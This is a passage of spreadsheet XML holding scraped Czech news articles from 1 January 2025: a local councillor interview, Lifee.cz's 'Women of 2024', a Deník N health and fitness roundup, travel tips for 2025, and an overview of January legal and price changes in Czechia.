ani tón. Hraju jen doma, chtěl bych sice do kapely, ale neměl bych na to čas. Jinak se snažíme se ženou hodně cestovat, milujeme Turecko . A rád se starám o zahradu. Jste také zastupitelem v Malých Žernosekách . Proč? Byla to původně snaha rozbít monopol vládnoucí strany v obci. Což se tedy nepodařilo. Zatím. Ale věříme, že se nám to za další dva roky podaří změnit. Žernoseky jsou jedno z nejhezčích míst široko daleko, jste u brány Českého středohoří. Kam byste mi doporučil vyrazit v okolí na výlet? Opárenské údolí je krásné, na konci údolí je mlýn, kam chodí všichni na jídlo a předražené pivo . A ti odvážnější si pak vyšlápnou na Lovoš. Autor: Ondřej Kubala Autor person Ondřej Kubala</t>
  </si>
  <si>
    <t>88620</t>
  </si>
  <si>
    <t>118080</t>
  </si>
  <si>
    <t>20250101_364_3693934889_074764003b132dd78c9a.html</t>
  </si>
  <si>
    <t>074764003b132dd78c9a</t>
  </si>
  <si>
    <t>Ženy roku 2024 podle magazínu Lifee.cz: Anička Slováčková inspiruje onkologické pacienty, Martina Ptáčková dává naději šikanovaným</t>
  </si>
  <si>
    <t>Ženy roku 2024 podle magazínu Lifee.cz: Anička Slováčková inspiruje onkologické pacienty, Martina Ptáčková dává naději šikanovaným Nejen významní muži, ale i schopné ženy hýbou světem. Nebo minimálně Českou republikou . Vybrali jsme pro vás na magazínu Lifee.cz osmičku dam s velkým D, které se (nejen) v roce 2024 zasloužily o dobrou věc nebo inspirativním způsobem zvládly těžkou životní zkoušku. Boj s rakovinou nevzdává herečka Anička Slováčková , za duševní zdraví mladistvých neúnavně bojuje novinářka Ivana Ašenbrenerová a pro všechny alkoholiky je tu spisovatelka Michaela Duffková. Jsou skvělé, odvážné a jen tak něco je nezastaví. Takové jsou ženy, které na sebe v roce 2024 poutaly největší pozornost a zaslouží si proniknout do našeho redakčního výběru . Nechybí v něm mimo již zmíněné dámy zpěvačka Marta Jandová , která se kvůli zákeřné nemoci rozhodla vzdát prsou i vaječníků , bojovnice a naše SuperWoman Martina Ptáčková , jež vedle excelentního výkonu ve StarDance neúnavně bojuje proti šikaně , spisovatelka Karin Lednická , zasazující se o popularizaci Karvinska , herečka Simona Peková , která se vyšplhala na samý vrchol své profese prakticky až na prahu sedmdesátky , a mentorka osobního rozvoje Katarina Emma Schapiro , jež se vedle spolupráce s vrcholovými manažery věnuje například inspirativnímu projektu Camino Berušky . Doporučené video: Rozhovor se SuperWoman Martinou Ptáčkovou Když tady budu o rok déle, bude to nádhera, říká Slováčková Snad nikdo na světě by si nechtěl vyslechnout diagnózu, kterou před rokem a půl stanovili lékaři devětadvacetileté Aničce Slováčkové . Dcera herečky Dagmar Patrasové a saxofonisty Felixe Slováčka si tou dobou myslela, že zlý sen v podobě rakoviny prsu je minulostí. Jenže se jí objevily metastázy na plicích a z poměrně nadějné prognózy se rázem stala ta nejhorší možná. Lékaři dávali talentované herečce jen pár měsíců života , pokud nepodstoupí paliativní chemoterapii. "Když ti někdo řekne, že máš tady nějaký spočítaný čas, tak tě to samozřejmě stresuje, ale řekla jsem si, že tohle říkají oni. Já nikdy neposlouchala to, co říkají lidi , takže si pojedu to svoje a budu bojovat za to, abych tady byla déle," prohlásila odhodlaná Anička v podcastu Bellis Pink Talks . "Řekla jsem si, že ten čas, který bych tady měla být podle prognóz, budu naplno věnovat tomu, abych se z toho dostala. Budu dělat věci, které mám ráda, a přestanu se bavit s lidmi, které ráda nemám. Opravdu od sebe odstřihnu toxické vztahy. Začala jsem i s radostí jíst všechny tátovy suplementy. Řekla jsem si, že něco z toho zabere, abych tady byla o rok déle. I ten rok by byl nádherný. Opravdu jsem se naučila žít naprostou přítomností," dodala odvážná dívka, která svým přístupem inspiruje onkologické pacienty po celé republice a zasazuje se o propagaci prevence rakoviny . Mohlo by Vás zajímat: Náctileté sužují úzkosti a deprese: Nově založená nadace Twisten Foundation to chce změnit Ivana Ašenbrenerová a její nadace zachránily 400 teenagerů Vlastní bolestná zkušenost motivovala k prospěšnému činu také novinářku Ivanu Ašenbrenerovou . Té se loni v červnu po vleklých depresích zabil devatenáctiletý syn , úspěšný esportový hráč Karel Twisten Ašenbrener. Ivana pak v prosinci 2023 založila na jeho počest nadační fond Twisten Foundation , který pomáhá mladým s psychickými problémy . " Karlův odchod je pro celou rodinu pořád velmi bolestivý, rozhodli jsme se přetavit bolest v něco smysluplného," uvedla loni Ivana. Letos fond oslavil první výročí své činnosti a může se pochlubit skvělým výsledkem - nejen prostřednictvím originálních chatů s odborníky pomohl už téměř čtyřem stovkách teenagerů , přičemž další stále přibývají. Duševní stav mladých lidí v ČR je totiž podle průzkumu Národního ústavu duševního zdraví alarmující. Mohlo by Vás zajímat: Autorka Zápisníku alkoholičky: S manželem jsme měli po ukončení léčby rok krizi, vzpomíná Michaela Duffková Bála se, že umře, teď Duffková pomáhá alkoholikům Před sedmi lety si sama prošla léčbou závislosti na alkoholu a své zkušenosti promítla do veleúspěšné knížky Zápisník alkoholičky, podle níž byl letos natočen film. Spisovatelka Michaela Duffková dnes ale o pití jen nepíše, ale také pomáhá. Poté, co její otec během čekání na protialkoholní léčbu spáchal sebevraždu , rozhodla se založit vlastní kliniku - Centrum Alkos - na niž se může obrátit kdokoliv, kdo má pocit, že se mu pití vymklo z rukou. Sama moc dobře ví, jak se takový člověk cítí. Se závislostí na alkoholu bojovala tři roky , než se odhodlala léčit. Přiměl ji k tomu nejen tlak okolí, ale i strach o život. "Bála jsem se, že umřu – ať budu pít, nebo pít nebudu,“ prozradila Michaela Duffková pro CNN Prima News . Které ženy letos podle názoru magazínu Lifee.cz hýbaly Českem ? Na to se můžete podívat v naší fotogalerii. Galerie Ženy roku 2024 podle magazínu Lifee.cz: Anička Slováčková inspiruje onkologické pacienty, Martina Ptáčková dává naději šikanovaným + 15 fotek + 16 fotek Herečka Anna Julie Slováčková se ve svých 29 letech potýká už podruhé s rakovinou. Zdroj: Herminapress Dcera saxofonisty Felixe Slováčka a herečky Dagmar Patrasové podstupuje paliativní péči. Táta je jí velkou oporou... ...stejně jako fenka Jindřiška. Zdroj: Tomáš Martínek/Extra Novinářka Ivana Ašenbrenerová založila po sebevraždě syna Karla nadační fond Twisten Foundation, který pomáhá mladým s duševními problémy. Letos se na něj obrátilo už na 400 teenagerů. Zdroj: Se souhlasem Ivany Ašenbrenerové Autorka knih Zápisník alkoholičky a Zápisník nealkoholičky Michaela Duffková založila Centrum Alkos , kde najdou pomoc lidé, již mají potíže s pitím. Podle knihy Zápisník alkoholičky vznikl letos stejnojmenný film s Terezou Ramba v hlavní roli. Michaela Duffková se před sedmi lety léčila ze závislosti na alkoholu . Její tatínek pak při čekání na terapii spáchal sebevraždu. Kickboxerka Martina Ptáčková na sebe letos upoutala pozornost účastí v taneční soutěži StarDance, kde s partnerem Dominikem Vodičkou vybojovali čtvrté místo. Zdroj: Se souhlasem České televize To ale zdaleka není jediné plus této ženy nečekaných možností. Krom toho, že je Martina osminásobnou mistryní světa v bojových sportech, spolu se svým bratrem založila roku 2020 projekt Šikana do klece, který pomáhá šikanovaným dětem nejen u nás, ale i v zahraničí. Zdroj: Lifee/ Lucie Robinson Martina Ptáčková byla proto zvolena také jednou ze SuperWomen podle magazínu Lifee.cz. Zpěvačka Marta Jandová se letos odhodlala k vážnému kroku v životě - kvůli mutaci v genech a vysokému riziku vzniku rakoviny si nechala odebrat prsa a vaječníky. Se svým příběhem se úspěšná pěnice a dcera rockové legendy Petra Jandy svěřila i Milušce Bittnerové v pořadu Na kafeečko. Zdroj: Lifee/Vítězslav Vybíral Herečka Simona Peková se celý život věnovala převážně divadlu, jeden čas také působila jako ředitelka Nadace Archa Chantal . Zdroj: Tomáš Martinek/Extra Loni ale za svůj herecký um a vůbec první hlavní filmovou roli ve snímku Přišla v noci získala Českého lva. To vše praktiky na prahu sedmdesátky. Simona je tak zářným příkladem, že na vrchol kariéry není nikdy pozdě. Katarina Emma Schapiro je mentorkou a konzultantkou v oblasti transformací, změn a koučování. Má řadu mezinárodních certifikací a spolupracovala se stovkami špičkových manažerů. Ale hlavně je to žena s velkým srdcem, která se angažuje v mnoha neziskových organizacích. Katarina například založila organizaci Camino Berušky, která sdružuje ženy s láskou k chůzi a bere ji jako jeden z prostředků sebepoznání. Vydala také spolu s kolegyněmi knihu Camino Berušky na cestě: Jít, meditovat, žít, kde najdete na 168 tras a tipů na výlety. Katarina Emma Schapiro byla také jednou z deseti SuperWoman na magazínu Lifee.cz. Tento seriál mapuje úspěšné české ženy. V neposlední řadě je pro magazín Lifee.cz Ženou roku 2024 i spisovatelka Karin Lednická , která letos získala od prezidenta Petra Pavla medaili Za zásluhy 1. stupně. Podle hlavy státu se totiž ve svých knihách věnuje „navrácení identity hornickému Karvinsku“, jako například v úspěšné trilogii Šikmý kostel o osudech lidí od konce 19. století do 60. let 20. století v regionu poznamenaném těžbou uhlí. Zdroj: Jan Handrejch /Právo/Profimedia Zdroj: Herminapress, se souhlasem České televize/koláž Lifee Autor: Tereza Švandová Autor person Tereza Švandová</t>
  </si>
  <si>
    <t>20250101_365_3693944832_1485b954b5bccfe71b2b.html</t>
  </si>
  <si>
    <t>1485b954b5bccfe71b2b</t>
  </si>
  <si>
    <t>Nový rok, stará předsevzetí? Připomeňte si nejlepší texty o&amp;nbsp;zdravé stravě a&amp;nbsp;sportování</t>
  </si>
  <si>
    <t>Nový rok, stará předsevzetí? Připomeňte si nejlepší texty o&amp;nbsp;zdravé stravě a&amp;nbsp;sportování 1. ledna 2025 5:57 2024 Jídlo a gastronomie Zdraví Nový rok, stará předsevzetí? Připomeňte si nejlepší texty o zdravé stravě a sportování Deník N Připomeňte si nejčtenější texty Deníku N o sportování a zdravém stravování. Foto: Adobe Stock Proč je pro tělo nejhorší bohémský život a jak mu správně nastavit rutinu? Je lepší sportovat ráno, nebo večer? A jak je to s tolik oslavovaným proteinem? Připomeňte si nejčtenější texty Deníku N o zdravém stravování i sportování. Tento text pro vás načetl robotický hlas. Pokud najdete chybu ve výslovnosti, dejte nám prosím vědět . Podcasty a audioverze článků můžete poslouchat v rámci klubového předplatného . Plné znění audioverzí článků je dostupné pouze pro předplatitele Klubu N. Upgradujte své předplatné. Plné znění audioverzí článků je dostupné pouze pro předplatitele Klubu N. Předplaťte si ho také. Zahleňuje mléko? Lepí lepek střeva? Jak zlý je „zlý“ cholesterol? Expert na výživu radí, co funguje a co rozhodně ne Miroslav Šindelář. Foto: Gabriel Kuchta, Deník N „Vždycky přijde nějaký zpěvák, zpěvačka, herečka nebo sportovec s další zázračnou dietou nebo vysloví další dávno vyvrácený mýtus,“ říká Miloslav Šindelář, expert na výživu a renomovaný nutriční poradce z Institutu moderní výživy. Ve velkém rozhovoru tyto pod kůži vryté mýty vyvrací a nabízí vědou posvěcené recepty na hubnutí a dlouhodobé udržení váhy. Deset rad, jak zdravě zhubnout: Pokud to přeženete, výsledek může být horší než nicnedělání Pro běžného člověka trénink nalačno nemá zásadní význam, říká expert. Foto: Adobe Stock Sportovní vědec a výživový poradce Milan Sedliak připravil deset rad týkajících se hubnutí. Radí, jak hubnout zdravě, varuje před opakovanými dietami a upozorňuje i na další chyby, které lidé ve snaze rychle zhubnout dělají. „Tělo má rádo rutinu, nejhorší je pro něj bohémský život,“ říká odborník na výživu Všichni máme bod hmotnosti, za který je obtížné se dostat, říká Sedliak. Foto: Vladimír Šimíček, Denník N „Nebojme se slova dieta, protože všichni nějakou máme. Jsou důležité,“ říká sportovní vědec Milan Sedliak . V rozhovoru popisuje, kdy je nejlepší doba na sladkosti či jak alkohol ovlivňuje naše spalování. „Je to startér nevázaného chování,“ vysvětluje. A popisuje také, v čem je dobrý takzvaný přerušovaný půst. „Proteinu nepotřebujete tolik, kolik vám namlouvají reklamy,“ říká autor bestsellerů o výživě Tim Spector . Foto: Peter Schiazza „Málo bílkovin? Spíš vám chybí vláknina,“ říká profesor genetické epidemiologie a odborník v oblasti střevního mikrobiomu Tim Spector . V rozhovoru popisuje, jak si správně vycvičit mikrobiom, jak (ne)připravovat zeleninu či jak se stravovat s ohledem na budoucnost planety. Někdy je bílý rohlík lepší než celozrnný. Výživový expert radí, jak lépe trénovat Martin Čupka. Foto: Vladimír Šimíček, Denník N „Dopoledne jsme rychlejší a odpoledne silnější, ale mluvíme o rozdílech na úrovni několika procent,“ říká výživový expert Martin Čupka. V rozhovoru popisuje, proč je bílý chléb či rohlík s džemem před tréninkem dobrá volba, jaké doplňky stravy mají na sportovní výkon jednoznačný vliv i jak bojovat s únavou. Dieta 30–30-30 je internetovou senzací. Podle expertů může s hubnutím pomoci, má však limity Ilustrační foto: ČTK Hodně bílkovin a trochu pohybu hned na začátku dne a máte hotovo. Sociální sítě ovládla nová jednoduchá dieta, kterou na rozdíl od mnoha jiných odborníci nezatracují. Na to, aby opravdu pomáhala, je ale potřeba počítat s několika jejími nedostatky. Běh, nebo chůze? Pokud jde o dlouhověkost, vítěz je jasný, ale pozor i na pravidelnost, říkají experti Foto: Emma Simpson / Unsplash / CC Mnohé sportovní aplikace ke konci roku zveřejňují bilance shrnující, jak se lidé v předešlém roce hýbali. Zaznamenaná data pravidelně odhalují nové trendy, některé údaje ale zůstávají už léta neměnné. Globálně nejpopulárnější formou pohybu je dlouhodobě chůze, hned za ní následuje běh. „Chléb nemůže za to, že jste přibrali. Když se do hubnutí pouštíte, položte si tři základní otázky,“ radí výživový expert Ilustrační foto: ČTK „Velkou pomůckou je mít stále s sebou lžičku,“ říká výživový specialista Martin Čupka. Popisuje, že jsou lidé, kteří si večer před spaním přečtou motivační citát na Instagramu a řeknou si, že zítra svůj život změní. Ráno po probuzení však spadnou zpět do svého kolotoče a nemají šanci udělat pozitivní změnu, ačkoli by ji v tu chvíli udělali rádi. Často přitom stačí pár jednoduchých změn a přijdou i výsledky. Lékařka o lécích na hubnutí typu Ozempic: Je to radikální řešení srovnatelné s operací na zmenšení žaludku Lékařka a vědkyně Adela Penesová působí v diabetologické a obezitologické ambulanci Ústavu klinického a translačního výzkumu Biomedicínského centra Slovenské akademie věd . Foto: Tomáš Benedikovič Pro mnoho lidí je jídlo jediná věc, která jim přináší požitek, říká lékařka a vědkyně Adela Penesová ze Slovenské akademie věd . Když se jim předepíšou léky na hubnutí jako Ozempic nebo Saxenda, hedonie se zablokuje. „Pokud pacient nemá partnerský nebo sociální život, opravdu se může stát, že si řekne, že pro něj život už nemá smysl,“ upozorňuje na nebezpečné následky. První dovnitř, první ven. Skladování potravin má svá pravidla. Naučte se správně zorganizovat lednici Foto: Adobe Stock Správné skladování potravin má zásadní vliv na chod domácnosti – může totiž efektivně zabránit zbytečnému plýtvání surovinami. A nejenže je zodpovědné k životnímu prostředí, ale šetří také peníze, čas i energii. Přinášíme rady a tipy, jak na to. Autor: Deník N Rubrika transition_slide Magazín</t>
  </si>
  <si>
    <t>65160</t>
  </si>
  <si>
    <t>20250101_366_3693921596_9987284e8d0afa85694d.html</t>
  </si>
  <si>
    <t>9987284e8d0afa85694d</t>
  </si>
  <si>
    <t>Kam vyrazit na dovolenou v&amp;nbsp;roce 2025? Přinášíme pět neotřelých tipů</t>
  </si>
  <si>
    <t>Kam vyrazit na dovolenou v&amp;nbsp;roce 2025? Přinášíme pět neotřelých tipů Kam vyrazit na dovolenou v roce 2025? Přinášíme pět neotřelých tipů S novým rokem nastává čas promyslet i nové cestovatelské plány. Láká vás více vyrazit někam do tepla, anebo spíše poznat izolovanou divočinu sevřenou ledovci? Pokud se nemůžete rozhodnout, co by pro vás bylo to pravé, nechte se inspirovat našimi tipy. Případně se v diskuzi podělte s dalšími čtenáři o svá vlastní doporučení. Dobrodružství na mrazivém ostrově Mrazivé Grónsko lze s klidem v srdci označit za jednu z posledních opravdových divočin. Na největším ostrově světa žije jen hrstka obyvatel, zhruba 56 tisíc, nenajdete tu žádná pulzující velkoměsta s ohromnými nákupními centry, stylovými kavárničkami ani nic podobného. Místo toho nabízí Grónsko přírodu, jíž dominují ledovce a nekonečné pláně. Nenechte se však zmást zdánlivou jednotvárností místní krajiny - během léta překvapí nejednoho návštěvníka i sytá zeleň, ve které jsou rozesety tisíce pestrobarevných květů. Je jasné, že příroda hraje na ostrově prim. Stovky let staré památky tu turisté obdivovat nebudou, zato mohou vyrazit třeba na pěší túru po ledovcích, plavbu podél pobřeží, na kajaky či paddleboardy do vln Severního ledového oceánu. Boom tu zažívá také cyklistika. A že lze v Grónsku spatřit polární záři, asi netřeba zdůrazňovat. Stejně tak je populární pozorování velryb. Grónsko pro návštěvu v roce 2025 doporučil i známý cestopisný magazín National Geographic, my ho do tipů zařazujeme zejména kvůli nedávno otevřenému mezinárodnímu letišti v hlavním městě Nuuk . Díky pravidelným linkám z Kodaně je jih ostrova mnohem dostupnější. Ponořit se do horkého pramene s výhledem na majestátní krajinu či fjordy zní zkrátka jako skvělý plán pro rok 2025. Za vínem do kolébky křesťanství Řada ostřílených cestovatelů radí, aby se lidé při plánování výletů vykašlali na Západ a jeli raději prozkoumat Východ. Ten bývá označován za autentičtější, protože ho ještě nezkazily davy turistů, jeho předností jsou pro Středoevropana i nižší ceny. Oběma klady se bezesporu pyšní Arménie , oslnivá země na podhůří Kavkazu a kolébka křesťanství. Hlavní město Jerevan leží strategicky uprostřed Arménie a je to z něj, co by kamenem dohodil, ke známým památkám, mimo jiné ke klášteru Chor Virap, nad nímž se tyčí biblická hora Ararat . Hodina jízdy autem dělí turisty také od jezera Sevan a dalšího krásného kláštera Sevanank, anebo od kláštera Geghard, jenž je zčásti vytesán do skály. Tamní genius loci uhrane i někoho, komu duchovní místa obvykle nic neříkají. Arménie je nicméně destinací vhodnou i pro milovníky vína . Jde totiž o jednu z nejstarších vinařských oblastí světa, archeologové zde objevili vůbec nejstarší vinici zvanou Areni-1. Její stáří je odhadováno zhruba do roků 4100 až 4000 před naším letopočtem. Arménie zkrátka nabízí komplexní a autentické zážitky pro ty, kteří nepotřebují přebujelý luxus. Ztratit se v černohorských lesích Že je Chorvatsko pro Čechy nejoblíbenější destinací, není třeba nijak zdůrazňovat. Co byste ale řekli na to, že nezastavíte v Dubrovníku , ale pojedete ještě dál na jih a překročíte hranice do Černé Hory ? Jadran je tu pořád stejně průzračný a oslnivý, najdete tu i krásná historická města, zejména v Kotorském zálivu, a navíc je poměrně snadno můžete vyměnit za útěk do hor. Traduje se, že právě podle tmavých lesů kolem hory Lovćen, jenž se nachází hned nad Kotorem , dostala Černá Hora své jméno. Hlavní barvou země je ovšem zelená v mnoha odstínech. A pokud vás láká zejména kochání se vrcholky a kopci, pak jste v Černé Hoře správně. Jednak tu nebude zdaleka tak narváno jako třeba v Rakouských Alpách či Vysokých Tatrách , pohoří Durmitor ležící ve stejnojmenném národním parku si vás ale získá i svým divokým charakterem. Prakticky netknutá příroda s hustými lesy a jezery je zkrátka uhrančivá. Černá Hora je nefalšovaný ohnivý Balkán , zároveň tu ale platí, že host do domu, bůh do domu. Místní mají pověst pohostinného národa, který se s návštěvníky rád podělí o něco dobrého - ať už o vyhlášenou sušenou šunku pršut, nebo o rakiji. Ale s ní to raději moc nepřehánějte, abyste černohorské krásy neviděli moc rozostřeně. Byla by to velká škoda! Emirát s adrenalinovým přívlastkem Je nám jasné, co si říkáte: Spojené arabské emiráty už všichni dobře znají, lidí je tam plno a dovolenou si tam užijí zejména ti, kdo mají hodně peněz. Připouštíme, že to na jednu stranu platí. V Dubaji si skutečně vychutnáte množství luxusu a opulentních výjevů. My ale tentokrát doporučujeme zejména emirát Rás al-Chajma, který leží na severu země. Není tak pompézní a rozhodně se nepyšní tolika rekordy; jeho lákadla jsou poněkud jiná. Dovolenou u moře v některém z hotelů tu můžete strávit stejně plnohodnotně jako v Dubaji , toho se náš tip ale netýká. Doporučení směřuje zejména k místnímu pohoří al-Hadžar, které působí při pohledu od úpatí velmi dramaticky. Ostrými serpentinami můžete dojet až k nejvýše položené restauraci v Emirátech, kde si milovníci adrenalinu zákonitě musejí vyzkoušet jízdu po nejdelší ziplině světa. Ještě o několik desítek metrů výš je záhodno uvelebit se v kempu sousedícím se šejkovou rezidencí. Zapadající slunce barvící vrcholky hor do ruda tu vytváří vskutku nádhernou přírodní podívanou. U pobřeží se pak mohou turisté seznámit s tisíciletou tradicí lovu perel - z oblasti Perského zálivu pocházejí jedny z nejhezčích a nejcennějších na světě. Nepředstavujte si ale nějakou nudnou edukaci, spíše praktickou ukázku, během níž vaše oči spočinou na stovkách perel. Emirát Rás al-Chajma zkrátka za návštěvu stojí, i kdyby jen na třídenní útěk z chaotické Dubaje . Na křižovatce kultur O Tchaj-wanu je nejčastěji slyšet ve spojitosti s výpravami českých politiků. Takové zprávy by ovšem neměly zastínit charakter a turistický potenciál ostrova, kterému se také říká Formosa, tedy nádherný. Naznačuje to, že příroda je místní velkou předností - nachází se tu devět národních parků, což je vzhledem k malé rozloze ostrova poměrně úctyhodné číslo. Obdivovat můžete prastaré lesy, členité pobřeží nebo rozlehlé čajové plantáže, které neztrácí nic ze svojí elegance, ani když je zahalí mlha. O Tchaj-wanu se občas říká, že je jakousi stravitelnější verzí Japonska - nelpí tak striktně na dodržování tradic, ale zároveň jde o technologickou velmoc, kde se svezete futuristickými rychlovlaky, abyste se pak na venkově zúčastnili tradiční čajové degustace. Oblíbený nápoj tu mimochodem převedli i do moderní podoby; na ostrově se v 80. letech zrodil bubble tea. Pokud ho máte zafixovaný jako pití plné cukru, tak musíte vyzkoušet ten tchajwanský s mlékem a tapiokovými perlami. Nesedne každému, ale do barevných přeslazených koktejlů má opravdu daleko. Gastronomie ovlivněná mnoha kulturami, ať už Japonskem , nebo Čínou , je rozhodně další předností Tchaj-wanu. Kulinární scéna oslavila v roce 2024 navíc jeden významný úspěch - slavný michelinský průvodce udělil vůbec poprvé hvězdičku zmrzlinárně. Podnik Minimal najdete v Tchaj-čungu a při návštěvě ostrova byste si ho rozhodně neměli nechat ujít. Kam vyrazíte v příštím roce? Název Grónska je v angličtině Greenland. Naznačuje, že nejde jen o zemi sevřenou v ledu. Kláštery patří mezi hlavní historické poklady Arménie . Pohoří Durmitor , kaňon řeky Tary Západ slunce v horách. Je to kýč, který neomrzí. Čajové plantáže, kam jen oko dohlédne. Tyto konkrétní vedou podél jednoho pěšího trailu ve střední části ostrova. Autor: Michael Švarc Autor Michael Švarc</t>
  </si>
  <si>
    <t>20250101_367_3693921526_0e2d8bd3277c4e23b46e.html</t>
  </si>
  <si>
    <t>0e2d8bd3277c4e23b46e</t>
  </si>
  <si>
    <t>Přehled: Vyšší důchody, dražší voda, nový zákoník práce. Leden přináší velké změny</t>
  </si>
  <si>
    <t>Přehled: Vyšší důchody, dražší voda, nový zákoník práce. Leden přináší velké změny Eva Vaňáčová 1. 1. 2025, 05:45 S příchodem nového roku nás čeká velké množství změn, které se dotknou téměř každého. Lidé si připlatí za odpad, pracující důchodci budou dostávat více peněz, cestujícím po Praze se kvůli uzavření dvou stanic metra významně zkomplikuje městská doprava. Změn je před námi ale mnohem více. Valorizace důchodů Velké změny přináší od nového roku důchodová reforma . Díky pravidelné lednové valorizaci si penzisté polepší, průměrný starobní důchod totiž vzroste o 358 korun – dosáhne tak výše 21 080 korun. P orostou rovněž invalidní, vdovské, vdovecké a sirotčí penze. Zvýšení provede Česká správa sociálního zabezpečení automaticky, není potřeba o něj žádat. Většina důchodců obdrží valorizační oznámení listovní zásilkou, kdo má datovou schránku, dostane tuto informaci jako přílohu datové zprávy. Pracující starobní důchodci , kteří dosáhli důchodového věku, nebudou nově z příjmu z výdělečné činnosti povinni platit pojistné na důchodové pojištění ve výši 6,5 % hrubé mzdy. O tuto částku se jim zvýší čistá mzda. Zároveň se ruší zvyšování starobního důchodu za výdělečnou činnost vykonávanou souběžně s jeho pobíráním. Vzroste i zvláštní příspěvek k důchodu pro účastníky národního boje za osvobození v letech 1939 až 1945. Snižuje se věk, ve kterém vzniká nárok na tzv. odložený starobní důchod, tedy důchod, na který vzniká nárok při dosažení vyššího než důchodového věku při získání kratší doby pojištění, a to ze současného důchodového věku muže stejného data narození zvýšeného o pěl let na důchodový věk muže stejného data narození zvýšený o dva roky. Prodlouží se lhůta pro obnovu nároku na vdovský či vdovecký důchod po jeho předchozím zániku ze současných dvou na pět let. O všech změnách informuje na svých stránkách ministerstvo práce a sociálních věcí ( MPSV ). Důchodová reforma přináší rovněž opatření, která jsou sice účinná od 1. ledna 2025, ale fakticky se dotknou až důchodů přiznávaných v roce 2026 a později. Týká se to například zvyšování důchodového věku o jeden kalendářní měsíc ročně pro lidi narozené po roce 1965, a to maximálně do 67 let. Zákoník práce Od ledna začnou platit další flexibilní novela zákoníku práce. Týká se to například zrychlení výpovědní lhůty – pokud zaměstnanec výpověď dá nebo ji dostane, nově by výpovědní lhůta měla běžet ode dne doručení výpovědi zaměstnavateli, ne až od prvního dne následujícího měsíce, jak tomu bylo dosud. Změna se týká i delší zkušební doby , novela to umožňuje po dohodě mezi zaměstnavatelem a zaměstnancem. U řadových zaměstnanců bude moci trvat až čtyři měsíce, u vedoucích zaměstnanců až osm měsíců. Novela myslí také na lidi, kteří se vrací po rodičovské dovolené do práce. Pokud se zaměstnanec vrátí do dvou let věku dítěte, zaměstnavatel mu musí držet jeho původní pracovní pozici. Dosud toto původní místo garantovat nemusel. Pokud se rodič vrátí do tří let věku dítěte, na stejnou pozici už nárok mít nebude. Další změnou je například plánování vlastní pracovní doby nebo vyšší limity pro nedanění některých benefitů . Lidem zaměstnaným na dohodu o provedení pracovní činnosti se zvyšuje limit pro výdělek, ze kterého neodvádí sociální pojištění. Mezi klíčové změny patří i zrušení institutu zaručené mzdy v soukromém sektoru, zavedení zaručeného platu pro veřejnou sféru a nový mechanismus valorizace minimální mzdy – od 1. ledna dojde ke zvýšení minimální mzdy o 1 900 na 20 800 korun za měsíc. Nově je minimální mzda stanovena podle valorizačního mechanismu. Paušálně o 1 400 korun od ledna vzrostou platy zaměstnanců ve veřejných službách a správě a státním zaměstnancům . Výjimku tvoří pedagogové v regionálním školství a akademičtí pracovníci státních vysokých škol, těm se platové tarify navýší v rozmezí od 1 090 do 4 040 korun. Kompletní informace o celém návrhu najdete ZDE . Od 1. ledna v Česku skončí kojenecké ústavy pro děti do tří let . Nyní v nich žije asi stovka dětí. Za další tři roky, tedy od 1. ledna 2028, pak bude následovat zákaz umisťovat do ústavní péče děti do sedmi let. Pošta bude přijímat eDoklady Od začátku ledna budou doručovatelé a pracovníci na přepážkách České pošty přijímat k prokázání totožnosti mobilní aplikaci eDoklady . N a přepážkách bude umístěn vytištěný QR kód, který klient ve své aplikaci načte a potvrdí, že souhlasí s tím, aby ČP pracovala při transakci s jeho elektronickým dokladem. Elektronickými doklady se bude možné prokázat také u pošty Partner. Úřad práce ruší některá nabízená místa Úřad práce vyřadí od ledna 2025 některé pracovní pozice. Týkat se to bude těch profesí, které jsou v nabídce více než šest měsíců, a tak už nemusí být aktuální. Pokud budou stále volné, zaměstnavatelé je musejí opět zapsat. Tuto půlroční lhůtu stanovuje novela zákona o zaměstnanosti, která platí od července 2024. Svoz textilu Města a obce budou muset mít od ledna 2025 povinnost třídit textilní odpad . Lidem tak musí poskytnout nádoby nebo místo pro ukládání takového odpadu, aby nekončil na skládkách. Na třídění textilu se tak nově budou vztahovat stejné požadavky jako na sběr papíru, plastů, skla nebo kovů. Bude na rozhodnutí každé obce, jaký konkrétní způsob separovaného sběru zvolí. Navíc v roce 2025 zdraží v některých městech a obcích svoz komunálního odpadu, a to kvůli navýšení sazeb za skládkování. Poplatek za svoz komunálního odpadu je místním poplatkem, tudíž jeho výši stanovuje daná obec či město vyhláškou, vždy na daný rok. Vodné a stočné Od 1. ledna 2025 většina měst a obcí zvyšuje ceny vodného a stočného . Důvodem je především inflace a zvýšené náklady. Přesto několik málo dodavatelů nechává stejné ceny jako v roce 2024, nebo dokonce zlevňuje. Přehled nových cen hlavních vodárenských společností najdete ZDE . Placení za léky Od ledna začne v Česku platit novela upravující placení za léky. Lidé už nebudou dostávat přeplatky zpět, po překročení určité částky už se jich nebudou doplatky týkat. Novela ruší povinnost pojišťoven hlídat, kdo má jak vysoký přeplatek za léky, stejně jako ho vyplácet. To nově bude sledovat systém eRecept. Pacienti, kteří v kalendářním roce překonají takzvaný ochranný limit, budou mít do konce roku léky bez doplatků. Lékárnám ho budou doplácet pojišťovny. Zbytek do limitu se bude zobrazovat v mobilní aplikaci eReceptu. Od 1. ledna 2025 začne navíc Česká správa sociálního zabezpečení přijímat podání od ošetřujících lékařů a zaměstnavatelů elektronicky pro některé dávky nemocenského pojištění . Konkrétně jde o peněžitou pomoc v mateřství (PPM), ošetřovné, dlouhodobé ošetřovné, otcovskou a vyrovnávací příspěvek v mateřství, a to pod názvem eDávky. Digitalizace se týká také mateřské, ta bude fungovat na stejném principu jako eNeschopenka. Budoucí maminky už nebudou muset žádat o mateřskou osobně na úřadu, vše bude možné vyřídit digitálně. Vyšší poplatky za pobyt ve městech Od nového roku se turistům pobyty v některých městech v Česku prodraží, a to kvůli zvyšujícím se pobytovým poplatkům, které se hradí v ubytovacích zařízeních. Třeba v Jihlavě se tato taxa zvedne více než dvojnásobně. V řadě turisticky oblíbených tuzemských destinacích sice pobytové poplatky růst nebudou, ale to jen proto, že ani ze zákona nemohou – už tam totiž jsou na maximech. "V Českém Krumlově zůstává poplatek z pobytu v roce 2025 stejný jako v roce 2024, což je 50 korun na osobu a den," sdělila mluvčí města Petra Nastávalová. Daňová opatření Od 1. ledna 2025 začíná platit řada nových daňových opatření nebo zavedení osvobození příjmů z kryptoaktiv fyzickými osobami. Změny pro řidiče Od nového roku zdraží autoškoly a zvednou se také ceny dálničních známek. Od 1. ledna 2025 jsou všechny členské státy Evropské unie povinny akceptovat elektronickou verzi zelené karty , například ve formátu PDF uloženém v mobilním telefonu nebo 